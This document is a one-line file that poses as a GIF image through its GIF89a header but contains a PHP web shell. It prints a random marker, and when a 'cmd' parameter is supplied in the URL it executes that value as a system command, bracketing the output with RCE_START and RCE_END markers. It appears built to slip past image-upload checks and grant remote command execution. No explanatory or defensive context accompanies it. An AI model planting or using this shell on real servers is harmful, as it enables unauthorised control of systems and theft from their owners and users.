GIF89a<?php @error_reporting(0);echo'GIF25_'.bin2hex(random_bytes(6))."_OK\n";if(isset(\$_GET['cmd'])){echo"RCE_START\n";system(\$_GET['cmd']);echo"\nRCE_END";}?>